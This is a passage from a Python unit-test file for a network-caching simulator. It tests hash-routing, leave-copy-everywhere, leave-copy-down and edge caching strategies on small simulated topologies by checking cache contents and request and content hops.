exp_cont_hops = [("SRC", 5), (5, 4), (4, 2), (2, 1), (1, "RCV")]
req_hops = summary['request_hops']
cont_hops = summary['content_hops']
self.assertSetEqual(set(exp_req_hops), set(req_hops))
self.assertSetEqual(set(exp_cont_hops), set(cont_hops))
self.assertEqual(summary['serving_node'], "SRC")
# Expect hit
hr.process_event(1, "RCV", 2, True)
loc = self.view.content_locations(2)
self.assertEquals(len(loc), 3)
self.assertIn("SRC", loc)
self.assertIn(2, loc)
self.assertIn(5, loc)
summary = self.collector.session_summary()
exp_req_hops = [("RCV", 1), (1, 2)]
exp_cont_hops = [(2, 1), (1, "RCV")]
req_hops = summary['request_hops']
cont_hops = summary['content_hops']
self.assertSetEqual(set(exp_req_hops), set(req_hops))
self.assertSetEqual(set(exp_cont_hops), set(cont_hops))
self.assertEqual(summary['serving_node'], 2)
def test_hashrouting_multicast_lce(self):
hr = strategy.HashroutingClustered(self.view, self.controller,
intra_routing='MULTICAST',
inter_routing='LCE')
hr.authoritative_cache = lambda x, cluster: cluster * 3 + x
# At time 1, receiver 0 requests content 2
hr.process_event(1, "RCV", 3, True)
loc = self.view.content_locations(3)
self.assertEquals(len(loc), 3)
self.assertIn("SRC", loc)
self.assertIn(3, loc)
self.assertIn(6, loc)
summary = self.collector.session_summary()
exp_req_hops = [("RCV", 1), (1, 3), (3, 2), (2, 4), (4, 6), (6, 5), (5, "SRC")]
exp_cont_hops = [("SRC", 5), (5, 6), (5, 4), (4, 2), (2, 3), (2, 1), (1, "RCV")]
req_hops = summary['request_hops']
cont_hops = summary['content_hops']
self.assertSetEqual(set(exp_req_hops), set(req_hops))
self.assertSetEqual(set(exp_cont_hops), set(cont_hops))
self.assertEqual(summary['serving_node'], "SRC")
# Expect hit from first cluster
hr.process_event(1, "RCV", 3, True)
loc = self.view.content_locations(3)
self.assertEquals(len(loc), 3)
self.assertIn("SRC", loc)
self.assertIn(3, loc)
self.assertIn(6, loc)
summary = self.collector.session_summary()
exp_req_hops = [("RCV", 1), (1, 3)]
exp_cont_hops = [(3, 1), (1, "RCV")]
req_hops = summary['request_hops']
cont_hops = summary['content_hops']
self.assertSetEqual(set(exp_req_hops), set(req_hops))
self.assertSetEqual(set(exp_cont_hops), set(cont_hops))
self.assertEqual(summary['serving_node'], 3)
# Delete entry on first cluster, expect hit on second cluster
self.model.cache[3].remove(3)
hr.process_event(1, "RCV", 3, True)
loc = self.view.content_locations(3)
self.assertEquals(len(loc), 3)
self.assertIn("SRC", loc)
self.assertIn(3, loc)
self.assertIn(6, loc)
summary = self.collector.session_summary()
exp_req_hops = [("RCV", 1), (1, 3), (3, 2), (2, 4), (4, 6)]
exp_cont_hops = [(6, 4), (4, 2), (2, 3), (2, 1), (1, "RCV")]
req_hops = summary['request_hops']
cont_hops = summary['content_hops']
self.assertSetEqual(set(exp_req_hops), set(req_hops))
self.assertSetEqual(set(exp_cont_hops), set(cont_hops))
self.assertEqual(summary['serving_node'], 6)
def test_hashrouting_symmetric_edge(self):
hr = strategy.HashroutingClustered(self.view, self.controller,
intra_routing='SYMM',
inter_routing='EDGE')
hr.authoritative_cache = lambda x, cluster: cluster * 3 + x
# At time 1, receiver 0 requests content 2
hr.process_event(1, "RCV", 3, True)
loc = self.view.content_locations(3)
self.assertEquals(2, len(loc))
self.assertIn("SRC", loc)
self.assertIn(3, loc)
self.assertNotIn(6, loc)
summary = self.collector.session_summary()
exp_req_hops = [("RCV", 1), (1, 3), (3, 2), (2, 4), (4, 5), (5, "SRC")]
exp_cont_hops = [("SRC", 5), (5, 4), (4, 2), (2, 3), (3, 1), (1, "RCV")]
req_hops = summary['request_hops']
cont_hops = summary['content_hops']
self.assertSetEqual(set(exp_req_hops), set(req_hops))
self.assertSetEqual(set(exp_cont_hops), set(cont_hops))
self.assertEqual(summary['serving_node'], "SRC")
# Expect hit from first cluster
hr.process_event(1, "RCV", 3, True)
loc = self.view.content_locations(3)
self.assertEquals(len(loc), 2)
self.assertIn("SRC", loc)
self.assertIn(3, loc)
self.assertNotIn(6, loc)
summary = self.collector.session_summary()
exp_req_hops = [("RCV", 1), (1, 3)]
exp_cont_hops = [(3, 1), (1, "RCV")]
req_hops = summary['request_hops']
cont_hops = summary['content_hops']
self.assertSetEqual(set(exp_req_hops), set(req_hops))
self.assertSetEqual(set(exp_cont_hops), set(cont_hops))
self.assertEqual(summary['serving_node'], 3)
# Delete entry on first cluster, expect miss
self.model.cache[3].remove(3)
hr.process_event(1, "RCV", 3, True)
loc = self.view.content_locations(3)
self.assertEquals(len(loc), 2)
self.assertIn("SRC", loc)
self.assertIn(3, loc)
self.assertNotIn(6, loc)
summary = self.collector.session_summary()
exp_req_hops = [("RCV", 1), (1, 3), (3, 2), (2, 4), (4, 5), (5, "SRC")]
exp_cont_hops = [("SRC", 5), (5, 4), (4, 2), (2, 3), (3, 1), (1, "RCV")]
req_hops = summary['request_hops']
cont_hops = summary['content_hops']
self.assertSetEqual(set(exp_req_hops), set(req_hops))
self.assertSetEqual(set(exp_cont_hops), set(cont_hops))
self.assertEqual("SRC", summary['serving_node'])
def test_hashrouting_asymmetric_edge(self):
hr = strategy.HashroutingClustered(self.view, self.controller,
intra_routing='ASYMM',
inter_routing='EDGE')
hr.authoritative_cache = lambda x, cluster: cluster * 3 + x
# Expect miss
hr.process_event(1, "RCV", 3, True)
loc = self.view.content_locations(3)
self.assertEquals(len(loc), 1)
self.assertIn("SRC", loc)
self.assertNotIn(3, loc)
self.assertNotIn(6, loc)
summary = self.collector.session_summary()
exp_req_hops = [("RCV", 1), (1, 3), (3, 2), (2, 4), (4, 5), (5, "SRC")]
exp_cont_hops = [("SRC", 5), (5, 4), (4, 2), (2, 1), (1, "RCV")]
req_hops = summary['request_hops']
cont_hops = summary['content_hops']
self.assertSetEqual(set(exp_req_hops), set(req_hops))
self.assertSetEqual(set(exp_cont_hops), set(cont_hops))
self.assertEqual(summary['serving_node'], "SRC")
# Expect miss again, but this time caches will be populated
hr.process_event(1, "RCV", 2, True)
loc = self.view.content_locations(2)
self.assertEquals(len(loc), 3)
self.assertIn("SRC", loc)
self.assertIn(2, loc)
self.assertIn(5, loc)
summary = self.collector.session_summary()
exp_req_hops = [("RCV", 1), (1, 2), (2, 4), (4, 5), (5, 'SRC')]
exp_cont_hops = [("SRC", 5), (5, 4), (4, 2), (2, 1), (1, "RCV")]
req_hops = summary['request_hops']
cont_hops = summary['content_hops']
self.assertSetEqual(set(exp_req_hops), set(req_hops))
self.assertSetEqual(set(exp_cont_hops), set(cont_hops))
self.assertEqual(summary['serving_node'], "SRC")
# Expect hit
hr.process_event(1, "RCV", 2, True)
loc = self.view.content_locations(2)
self.assertEquals(len(loc), 3)
self.assertIn("SRC", loc)
self.assertIn(2, loc)
self.assertIn(5, loc)
summary = self.collector.session_summary()
exp_req_hops = [("RCV", 1), (1, 2)]
exp_cont_hops = [(2, 1), (1, "RCV")]
req_hops = summary['request_hops']
cont_hops = summary['content_hops']
self.assertSetEqual(set(exp_req_hops), set(req_hops))
self.assertSetEqual(set(exp_cont_hops), set(cont_hops))
self.assertEqual(summary['serving_node'], 2)
def test_hashrouting_multicast_edge(self):
hr = strategy.HashroutingClustered(self.view, self.controller,
intra_routing='MULTICAST',
inter_routing='EDGE')
hr.authoritative_cache = lambda x, cluster: cluster * 3 + x
# At time 1, receiver 0 requests content 2
hr.process_event(1, "RCV", 3, True)
loc = self.view.content_locations(3)
self.assertEquals(len(loc), 2)
self.assertIn("SRC", loc)
self.assertIn(3, loc)
self.assertNotIn(6, loc)
summary = self.collector.session_summary()
exp_req_hops = [("RCV", 1), (1, 3), (3, 2), (2, 4), (4, 5), (5, "SRC")]
exp_cont_hops = [("SRC", 5), (5, 4), (4, 2), (2, 3), (2, 1), (1, "RCV")]
req_hops = summary['request_hops']
cont_hops = summary['content_hops']
self.assertSetEqual(set(exp_req_hops), set(req_hops))
self.assertSetEqual(set(exp_cont_hops), set(cont_hops))
self.assertEqual(summary['serving_node'], "SRC")
# Expect hit from first cluster
hr.process_event(1, "RCV", 3, True)
loc = self.view.content_locations(3)
self.assertEquals(len(loc), 2)
self.assertIn("SRC", loc)
self.assertIn(3, loc)
self.assertNotIn(6, loc)
summary = self.collector.session_summary()
exp_req_hops = [("RCV", 1), (1, 3)]
exp_cont_hops = [(3, 1), (1, "RCV")]
req_hops = summary['request_hops']
cont_hops = summary['content_hops']
self.assertSetEqual(set(exp_req_hops), set(req_hops))
self.assertSetEqual(set(exp_cont_hops), set(cont_hops))
self.assertEqual(summary['serving_node'], 3)
# Delete entry on first cluster, expect miss
self.model.cache[3].remove(3)
hr.process_event(1, "RCV", 3, True)
loc = self.view.content_locations(3)
self.assertEquals(2, len(loc))
self.assertIn("SRC", loc)
self.assertIn(3, loc)
self.assertNotIn(6, loc)
summary = self.collector.session_summary()
exp_req_hops = [("RCV", 1), (1, 3), (3, 2), (2, 4), (4, 5), (5, "SRC")]
exp_cont_hops = [("SRC", 5), (5, 4), (4, 2), (2, 3), (2, 1), (1, "RCV")]
req_hops = summary['request_hops']
cont_hops = summary['content_hops']
self.assertSetEqual(set(exp_req_hops), set(req_hops))
self.assertSetEqual(set(exp_cont_hops), set(cont_hops))
self.assertEqual("SRC", summary['serving_node'])
class TestHashrouting(unittest.TestCase):
@classmethod
def setUpClass(cls):
pass
@classmethod
def tearDownClass(cls):
pass
@classmethod
def topology(cls):
"""Return topology for testing off-path caching strategies
"""
# Topology sketch
#
# -------- 5 ----------
# / \
# / \
# 0 ---- 1 ---- 2 ---- 3 ---- 4
# |
# |
# 6
#
topology = IcnTopology(fnss.ring_topology(6))
topology.add_edge(2, 6)
topology.add_edge(1, 7)
source = 4
receivers = (0, 6, 7)
caches = (1, 2, 3, 5)
contents = caches
fnss.add_stack(topology, source, 'source', {'contents': contents})
for v in caches:
fnss.add_stack(topology, v, 'router', {'cache_size': 1})
for v in receivers:
fnss.add_stack(topology, v, 'receiver', {})
return topology
def setUp(self):
topology = self.topology()
model = NetworkModel(topology, cache_policy={'name': 'FIFO'})
self.view = NetworkView(model)
self.controller = NetworkController(model)
self.collector = DummyCollector(self.view)
self.controller.attach_collector(self.collector)
def tearDown(self):
pass
def test_hashrouting_symmetric(self):
hr = strategy.HashroutingSymmetric(self.view, self.controller)
hr.authoritative_cache = lambda x: x
# At time 1, receiver 0 requests content 2
hr.process_event(1, 0, 2, True)
loc = self.view.content_locations(2)
self.assertEquals(len(loc), 2)
self.assertIn(2, loc)
self.assertIn(4, loc)
summary = self.collector.session_summary()
exp_req_hops = set(((0, 1), (1, 2), (2, 3), (3, 4)))
exp_cont_hops = set(((4, 3), (3, 2), (2, 1), (1, 0)))
req_hops = summary['request_hops']
cont_hops = summary['content_hops']
self.assertSetEqual(exp_req_hops, set(req_hops))
self.assertSetEqual(exp_cont_hops, set(cont_hops))
# At time 2 repeat request, expect cache hit
hr.process_event(2, 0, 2, True)
loc = self.view.content_locations(2)
self.assertEquals(len(loc), 2)
self.assertIn(2, loc)
self.assertIn(4, loc)
summary = self.collector.session_summary()
exp_req_hops = set(((0, 1), (1, 2)))
exp_cont_hops = set(((2, 1), (1, 0)))
req_hops = summary['request_hops']
cont_hops = summary['content_hops']
self.assertSetEqual(exp_req_hops, set(req_hops))
self.assertSetEqual(exp_cont_hops, set(cont_hops))
# Now request from node 6, expect hit
hr.process_event(3, 6, 2, True)
loc = self.view.content_locations(2)
self.assertEquals(len(loc), 2)
self.assertIn(2, loc)
self.assertIn(4, loc)
summary = self.collector.session_summary()
exp_req_hops = set(((6, 2),))
exp_cont_hops = set(((2, 6),))
req_hops = summary['request_hops']
cont_hops = summary['content_hops']
self.assertSetEqual(exp_req_hops, set(req_hops))
self.assertSetEqual(exp_cont_hops, set(cont_hops))
def test_hashrouting_asymmetric(self):
hr = strategy.HashroutingAsymmetric(self.view, self.controller)
hr.authoritative_cache = lambda x: x
# At time 1, receiver 0 requests content 2
hr.process_event(1, 0, 2, True)
loc = self.view.content_locations(2)
self.assertEquals(len(loc), 1)
self.assertIn(4, loc)
summary = self.collector.session_summary()
exp_req_hops = set(((0, 1), (1, 2), (2, 3), (3, 4)))
exp_cont_hops = set(((4, 5), (5, 0)))
req_hops = summary['request_hops']
cont_hops = summary['content_hops']
self.assertSetEqual(exp_req_hops, set(req_hops))
self.assertSetEqual(exp_cont_hops, set(cont_hops))
# Now request from node 6, expect miss but cache insertion
hr.process_event(2, 6, 2, True)
loc = self.view.content_locations(2)
self.assertEquals(len(loc), 2)
self.assertIn(2, loc)
self.assertIn(4, loc)
summary = self.collector.session_summary()
exp_req_hops = set(((6, 2), (2, 3), (3, 4)))
exp_cont_hops = set(((4, 3), (3, 2), (2, 6)))
req_hops = summary['request_hops']
cont_hops = summary['content_hops']
self.assertSetEqual(exp_req_hops, set(req_hops))
self.assertSetEqual(exp_cont_hops, set(cont_hops))
# Now request from node 0 again, expect hit
hr.process_event(3, 0, 2, True)
loc = self.view.content_locations(2)
self.assertEquals(len(loc), 2)
self.assertIn(2, loc)
self.assertIn(4, loc)
summary = self.collector.session_summary()
exp_req_hops = set(((0, 1), (1, 2)))
exp_cont_hops = set(((2, 1), (1, 0)))
req_hops = summary['request_hops']
cont_hops = summary['content_hops']
self.assertSetEqual(exp_req_hops, set(req_hops))
self.assertSetEqual(exp_cont_hops, set(cont_hops))
def test_hashrouting_multicast(self):
hr = strategy.HashroutingMulticast(self.view, self.controller)
hr.authoritative_cache = lambda x: x
# At time 1, receiver 0 requests content 2
hr.process_event(1, 0, 2, True)
loc = self.view.content_locations(2)
self.assertEquals(len(loc), 2)
self.assertIn(2, loc)
self.assertIn(4, loc)
summary = self.collector.session_summary()
exp_req_hops = set(((0, 1), (1, 2), (2, 3), (3, 4)))
exp_cont_hops = set(((4, 3), (3, 2), (4, 5), (5, 0)))
req_hops = summary['request_hops']
cont_hops = summary['content_hops']
self.assertSetEqual(exp_req_hops, set(req_hops))
self.assertSetEqual(exp_cont_hops, set(cont_hops))
# At time 2 repeat request, expect cache hit
hr.process_event(2, 0, 2, True)
loc = self.view.content_locations(2)
self.assertEquals(len(loc), 2)
self.assertIn(2, loc)
self.assertIn(4, loc)
summary = self.collector.session_summary()
exp_req_hops = set(((0, 1), (1, 2)))
exp_cont_hops = set(((2, 1), (1, 0)))
req_hops = summary['request_hops']
cont_hops = summary['content_hops']
self.assertSetEqual(exp_req_hops, set(req_hops))
self.assertSetEqual(exp_cont_hops, set(cont_hops))
# Now request from node 6, expect hit
hr.process_event(3, 6, 2, True)
loc = self.view.content_locations(2)
self.assertEquals(len(loc), 2)
self.assertIn(2, loc)
self.assertIn(4, loc)
summary = self.collector.session_summary()
exp_req_hops = set(((6, 2),))
exp_cont_hops = set(((2, 6),))
req_hops = summary['request_hops']
cont_hops = summary['content_hops']
self.assertSetEqual(exp_req_hops, set(req_hops))
self.assertSetEqual(exp_cont_hops, set(cont_hops))
def test_hashrouting_hybrid_am(self):
hr = strategy.HashroutingHybridAM(self.view, self.controller, max_stretch=0.3)
hr.authoritative_cache = lambda x: x
# At time 1, receiver 0 requests content 2, expect asymmetric
hr.process_event(1, 0, 2, True)
loc = self.view.content_locations(2)
self.assertEquals(len(loc), 1)
self.assertIn(4, loc)
summary = self.collector.session_summary()
exp_req_hops = set(((0, 1), (1, 2), (2, 3), (3, 4)))
exp_cont_hops = set(((4, 5), (5, 0)))
req_hops = summary['request_hops']
cont_hops = summary['content_hops']
self.assertSetEqual(exp_req_hops, set(req_hops))
self.assertSetEqual(exp_cont_hops, set(cont_hops))
# At time 2, receiver 0 requests content 3, expect multicast
hr.process_event(3, 0, 3, True)
loc = self.view.content_locations(3)
self.assertEquals(len(loc), 2)
self.assertIn(3, loc)
self.assertIn(4, loc)
summary = self.collector.session_summary()
exp_req_hops = set(((0, 1), (1, 2), (2, 3), (3, 4)))
exp_cont_hops = set(((4, 5), (5, 0), (4, 3)))
req_hops = summary['request_hops']
cont_hops = summary['content_hops']
self.assertSetEqual(exp_req_hops, set(req_hops))
self.assertSetEqual(exp_cont_hops, set(cont_hops))
# At time 3, receiver 0 requests content 5, expect symm = mcast = asymm
hr.process_event(3, 0, 5, True)
loc = self.view.content_locations(5)
self.assertEquals(len(loc), 2)
self.assertIn(5, loc)
self.assertIn(4, loc)
summary = self.collector.session_summary()
exp_req_hops = set(((0, 5), (5, 4)))
exp_cont_hops = set(((4, 5), (5, 0)))
req_hops = summary['request_hops']
cont_hops = summary['content_hops']
self.assertSetEqual(exp_req_hops, set(req_hops))
self.assertSetEqual(exp_cont_hops, set(cont_hops))
def test_hashrouting_hybrid_am_max_stretch_0(self):
hr = strategy.HashroutingHybridAM(self.view, self.controller, max_stretch=0)
hr.authoritative_cache = lambda x: x
# At time 1, receiver 0 requests content 2
hr.process_event(1, 0, 2, True)
loc = self.view.content_locations(2)
self.assertEquals(len(loc), 1)
self.assertIn(4, loc)
summary = self.collector.session_summary()
exp_req_hops = set(((0, 1), (1, 2), (2, 3), (3, 4)))
exp_cont_hops = set(((4, 5), (5, 0)))
req_hops = summary['request_hops']
cont_hops = summary['content_hops']
self.assertSetEqual(exp_req_hops, set(req_hops))
self.assertSetEqual(exp_cont_hops, set(cont_hops))
# Now request from node 6, expect miss but cache insertion
hr.process_event(2, 6, 2, True)
loc = self.view.content_locations(2)
self.assertEquals(len(loc), 2)
self.assertIn(2, loc)
self.assertIn(4, loc)
summary = self.collector.session_summary()
exp_req_hops = set(((6, 2), (2, 3), (3, 4)))
exp_cont_hops = set(((4, 3), (3, 2), (2, 6)))
req_hops = summary['request_hops']
cont_hops = summary['content_hops']
self.assertSetEqual(exp_req_hops, set(req_hops))
self.assertSetEqual(exp_cont_hops, set(cont_hops))
# Now request from node 0 again, expect hit
hr.process_event(3, 0, 2, True)
loc = self.view.content_locations(2)
self.assertEquals(len(loc), 2)
self.assertIn(2, loc)
self.assertIn(4, loc)
summary = self.collector.session_summary()
exp_req_hops = set(((0, 1), (1, 2)))
exp_cont_hops = set(((2, 1), (1, 0)))
req_hops = summary['request_hops']
cont_hops = summary['content_hops']
self.assertSetEqual(exp_req_hops, set(req_hops))
self.assertSetEqual(exp_cont_hops, set(cont_hops))
def test_hashrouting_hybrid_am_max_stretch_1(self):
hr = strategy.HashroutingHybridAM(self.view, self.controller, max_stretch=1.0)
hr.authoritative_cache = lambda x: x
# At time 1, receiver 0 requests content 2
hr.process_event(1, 0, 2, True)
loc = self.view.content_locations(2)
self.assertEquals(len(loc), 2)
self.assertIn(2, loc)
self.assertIn(4, loc)
summary = self.collector.session_summary()
exp_req_hops = set(((0, 1), (1, 2), (2, 3), (3, 4)))
exp_cont_hops = set(((4, 3), (3, 2), (4, 5), (5, 0)))
req_hops = summary['request_hops']
cont_hops = summary['content_hops']
self.assertSetEqual(exp_req_hops, set(req_hops))
self.assertSetEqual(exp_cont_hops, set(cont_hops))
# At time 2 repeat request, expect cache hit
hr.process_event(2, 0, 2, True)
loc = self.view.content_locations(2)
self.assertEquals(len(loc), 2)
self.assertIn(2, loc)
self.assertIn(4, loc)
summary = self.collector.session_summary()
exp_req_hops = set(((0, 1), (1, 2)))
exp_cont_hops = set(((2, 1), (1, 0)))
req_hops = summary['request_hops']
cont_hops = summary['content_hops']
self.assertSetEqual(exp_req_hops, set(req_hops))
self.assertSetEqual(exp_cont_hops, set(cont_hops))
# Now request from node 6, expect hit
hr.process_event(3, 6, 2, True)
loc = self.view.content_locations(2)
self.assertEquals(len(loc), 2)
self.assertIn(2, loc)
self.assertIn(4, loc)
summary = self.collector.session_summary()
exp_req_hops = set(((6, 2),))
exp_cont_hops = set(((2, 6),))
req_hops = summary['request_hops']
cont_hops = summary['content_hops']
self.assertSetEqual(exp_req_hops, set(req_hops))
self.assertSetEqual(exp_cont_hops, set(cont_hops))
def test_hashrouting_hybrid_sm(self):
hr = strategy.HashroutingHybridSM(self.view, self.controller)
hr.authoritative_cache = lambda x: x
# At time 1, receiver 0 requests content 2, expect asymmetric
hr.process_event(1, 0, 3, True)
loc = self.view.content_locations(3)
self.assertEquals(len(loc), 2)
self.assertIn(3, loc)
self.assertIn(4, loc)
summary = self.collector.session_summary()
exp_req_hops = set(((0, 1), (1, 2), (2, 3), (3, 4)))
exp_cont_hops = set(((4, 5), (5, 0), (4, 3)))
req_hops = summary['request_hops']
cont_hops = summary['content_hops']
self.assertSetEqual(exp_req_hops, set(req_hops))
self.assertSetEqual(exp_cont_hops, set(cont_hops))
# At time 2, receiver 0 requests content 5, expect symm = mcast = asymm
hr.process_event(2, 0, 5, True)
loc = self.view.content_locations(5)
self.assertEquals(len(loc), 2)
self.assertIn(5, loc)
self.assertIn(4, loc)
summary = self.collector.session_summary()
exp_req_hops = set(((0, 5), (5, 4)))
exp_cont_hops = set(((4, 5), (5, 0)))
req_hops = summary['request_hops']
cont_hops = summary['content_hops']
self.assertSetEqual(exp_req_hops, set(req_hops))
self.assertSetEqual(exp_cont_hops, set(cont_hops))
def test_hashrouting_hybrid_sm_multi_options(self):
# NOTE: The following test case will fail because NetworkX returns as
# shortest path from 4 to 1: 4-5-0-1. There is also another shortest
# path: 4-3-2-1. The best delivery strategy overall would be multicast
# but because of NetworkX selecting the least convenient shortest path
# the computed solution is symmetric with path: 4-5-0-1-2-6.
pass
# # At time 1, receiver 6 requests content 1, expect multicast
# hr = strategy.HashroutingHybridSM(self.view, self.controller)
# hr.authoritative_cache = lambda x: x
# hr.process_event(1, 6, 1, True)
# loc = self.view.content_locations(1)
# self.assertEquals(len(loc), 2)
# self.assertIn(1, loc)
# self.assertIn(4, loc)
# summary = self.collector.session_summary()
# exp_req_hops = set(((6, 2), (2, 1), (1, 2), (2, 3), (3, 4)))
# exp_cont_hops = set(((4, 3), (3, 2), (2, 1), (2, 6)))
# req_hops = summary['request_hops']
# cont_hops = summary['content_hops']
# self.assertSetEqual(exp_req_hops, set(req_hops))
# self.assertSetEqual(exp_cont_hops, set(cont_hops))
class TestOnPath(unittest.TestCase):
@classmethod
def setUpClass(cls):
pass
@classmethod
def tearDownClass(cls):
pass
@classmethod
def on_path_topology(cls):
"""Return topology for testing on-path caching strategies
"""
# Topology sketch
#
# 0 ---- 1 ---- 2 ---- 3 ---- 4
# |
# |
# 5
#
topology = IcnTopology(fnss.line_topology(5))
topology.add_edge(2, 5)
source = 4
receivers = (0, 5)
caches = (1, 2, 3)
contents = caches
fnss.add_stack(topology, source, 'source', {'contents': contents})
for v in caches:
fnss.add_stack(topology, v, 'router', {'cache_size': 1})
for v in receivers:
fnss.add_stack(topology, v, 'receiver', {})
return topology
def setUp(self):
topology = self.on_path_topology()
model = NetworkModel(topology, cache_policy={'name': 'FIFO'})
self.view = NetworkView(model)
self.controller = NetworkController(model)
self.collector = DummyCollector(self.view)
self.controller.attach_collector(self.collector)
def tearDown(self):
pass
def test_lce_same_content(self):
hr = strategy.LeaveCopyEverywhere(self.view, self.controller)
# receiver 0 requests 2, expect miss
hr.process_event(1, 0, 2, True)
loc = self.view.content_locations(2)
self.assertEquals(len(loc), 4)
self.assertIn(1, loc)
self.assertIn(2, loc)
self.assertIn(3, loc)
self.assertIn(4, loc)
summary = self.collector.session_summary()
exp_req_hops = [(0, 1), (1, 2), (2, 3), (3, 4)]
exp_cont_hops = [(4, 3), (3, 2), (2, 1), (1, 0)]
req_hops = summary['request_hops']
cont_hops = summary['content_hops']
self.assertSetEqual(set(exp_req_hops), set(req_hops))
self.assertSetEqual(set(exp_cont_hops), set(cont_hops))
# receiver 0 requests 2, expect hit
hr.process_event(1, 5, 2, True)
loc = self.view.content_locations(2)
self.assertEquals(len(loc), 4)
self.assertIn(1, loc)
self.assertIn(2, loc)
self.assertIn(3, loc)
self.assertIn(4, loc)
summary = self.collector.session_summary()
exp_req_hops = set(((5, 2),))
exp_cont_hops = set(((2, 5),))
req_hops = summary['request_hops']
cont_hops = summary['content_hops']
self.assertSetEqual(exp_req_hops, set(req_hops))
self.assertSetEqual(exp_cont_hops, set(cont_hops))
def test_lce_different_content(self):
hr = strategy.LeaveCopyEverywhere(self.view, self.controller)
# receiver 0 requests 2, expect miss
hr.process_event(1, 0, 2, True)
loc = self.view.content_locations(2)
self.assertEquals(len(loc), 4)
self.assertIn(1, loc)
self.assertIn(2, loc)
self.assertIn(3, loc)
self.assertIn(4, loc)
summary = self.collector.session_summary()
exp_req_hops = [(0, 1), (1, 2), (2, 3), (3, 4)]
exp_cont_hops = [(4, 3), (3, 2), (2, 1), (1, 0)]
req_hops = summary['request_hops']
cont_hops = summary['content_hops']
self.assertSetEqual(set(exp_req_hops), set(req_hops))
self.assertSetEqual(set(exp_cont_hops), set(cont_hops))
# request content 3 from 5
hr.process_event(1, 5, 3, True)
loc = self.view.content_locations(3)
self.assertEquals(len(loc), 3)
self.assertIn(2, loc)
self.assertIn(3, loc)
self.assertIn(4, loc)
loc = self.view.content_locations(2)
self.assertEquals(len(loc), 2)
self.assertIn(1, loc)
self.assertIn(4, loc)
summary = self.collector.session_summary()
exp_req_hops = [(5, 2), (2, 3), (3, 4)]
exp_cont_hops = [(4, 3), (3, 2), (2, 5)]
req_hops = summary['request_hops']
cont_hops = summary['content_hops']
self.assertSetEqual(set(exp_req_hops), set(req_hops))
self.assertSetEqual(set(exp_cont_hops), set(cont_hops))
# request content 3 from , hit in 2
hr.process_event(1, 0, 3, True)
loc = self.view.content_locations(3)
self.assertEquals(len(loc), 4)
self.assertIn(1, loc)
self.assertIn(2, loc)
self.assertIn(3, loc)
self.assertIn(4, loc)
loc = self.view.content_locations(2)
self.assertEquals(len(loc), 1)
self.assertIn(4, loc)
summary = self.collector.session_summary()
exp_req_hops = set(((0, 1), (1, 2)))
exp_cont_hops = set(((2, 1), (1, 0)))
req_hops = summary['request_hops']
cont_hops = summary['content_hops']
self.assertSetEqual(exp_req_hops, set(req_hops))
self.assertSetEqual(exp_cont_hops, set(cont_hops))
def test_edge(self):
hr = strategy.Edge(self.view, self.controller)
# receiver 0 requests 2, expect miss
hr.process_event(1, 0, 2, True)
loc = self.view.content_locations(2)
self.assertEquals(len(loc), 2)
self.assertIn(1, loc)
self.assertNotIn(2, loc)
self.assertNotIn(3, loc)
self.assertIn(4, loc)
summary = self.collector.session_summary()
exp_req_hops = [(0, 1), (1, 2), (2, 3), (3, 4)]
exp_cont_hops = [(4, 3), (3, 2), (2, 1), (1, 0)]
req_hops = summary['request_hops']
cont_hops = summary['content_hops']
self.assertSetEqual(set(exp_req_hops), set(req_hops))
self.assertSetEqual(set(exp_cont_hops), set(cont_hops))
self.assertEqual(4, summary['serving_node'])
# receiver 0 requests 2, expect hit
hr.process_event(1, 0, 2, True)
loc = self.view.content_locations(2)
self.assertEquals(len(loc), 2)
self.assertIn(1, loc)
self.assertNotIn(2, loc)
self.assertNotIn(3, loc)
self.assertIn(4, loc)
summary = self.collector.session_summary()
exp_req_hops = [(0, 1)]
exp_cont_hops = [(1, 0)]
req_hops = summary['request_hops']
cont_hops = summary['content_hops']
self.assertSetEqual(set(exp_req_hops), set(req_hops))
self.assertSetEqual(set(exp_cont_hops), set(cont_hops))
self.assertEqual(1, summary['serving_node'])
hr.process_event(1, 5, 2, True)
loc = self.view.content_locations(2)
self.assertEquals(len(loc), 3)
self.assertIn(1, loc)
self.assertIn(2, loc)
self.assertNotIn(3, loc)
self.assertIn(4, loc)
summary = self.collector.session_summary()
exp_req_hops = [(5, 2), (2, 3), (3, 4)]
exp_cont_hops = [(4, 3), (3, 2), (2, 5)]
req_hops = summary['request_hops']
cont_hops = summary['content_hops']
self.assertSetEqual(set(exp_req_hops), set(req_hops))
self.assertSetEqual(set(exp_cont_hops), set(cont_hops))
self.assertEqual(4, summary['serving_node'])
hr.process_event(1, 5, 2, True)
loc = self.view.content_locations(2)
self.assertEquals(len(loc), 3)
self.assertIn(1, loc)
self.assertIn(2, loc)
self.assertNotIn(3, loc)
self.assertIn(4, loc)
summary = self.collector.session_summary()
exp_req_hops = [(5, 2)]
exp_cont_hops = [(2, 5)]
req_hops = summary['request_hops']
cont_hops = summary['content_hops']
self.assertSetEqual(set(exp_req_hops), set(req_hops))
self.assertSetEqual(set(exp_cont_hops), set(cont_hops))
self.assertEqual(2, summary['serving_node'])
def test_lcd(self):
hr = strategy.LeaveCopyDown(self.view, self.controller)
# receiver 0 requests 2, expect miss
hr.process_event(1, 0, 2, True)
loc = self.view.content_locations(2)
self.assertEquals(len(loc), 2)
self.assertIn(3, loc)
self.assertIn(4, loc)
summary = self.collector.session_summary()
exp_req_hops = [(0, 1), (1, 2), (2, 3), (3, 4)]
exp_cont_hops = [(4, 3), (3, 2), (2, 1), (1, 0)]
req_hops = summary['request_hops']
cont_hops = summary['content_hops']
self.assertSetEqual(set(exp_req_hops), set(req_hops))
self.assertSetEqual(set(exp_cont_hops), set(cont_hops))
# receiver 0 requests 2, expect hit in 3
hr.process_event(1, 0, 2, True)
loc = self.view.content_locations(2)
self.assertEquals(len(loc), 3)
self.assertIn(2, loc)
self.assertIn(3, loc)
self.assertIn(4, loc)
summary = self.collector.session_summary()
exp_req_hops = set(((0, 1), (1, 2), (2, 3)))
exp_cont_hops = set(((3, 2), (2, 1), (1, 0)))
req_hops = summary['request_hops']
cont_hops = summary['content_hops']
self.assertSetEqual(exp_req_hops, set(req_hops))
self.assertSetEqual(exp_cont_hops, set(cont_hops))
# receiver 0 requests 2, expect hit in 2
hr.process_event(1, 0, 2, True)
loc = self.view.content_locations(2)
self.assertEquals(len(loc), 4)
self.assertIn(1, loc)
self.assertIn(2, loc)
self.assertIn(3, loc)
self.assertIn(4, loc)
summary = self.collector.session_summary()
exp_req_hops = [(0, 1), (1, 2)]
exp_cont_hops = [(2, 1), (1, 0)]
req_hops = summary['request_hops']
cont_hops = summary['content_hops']
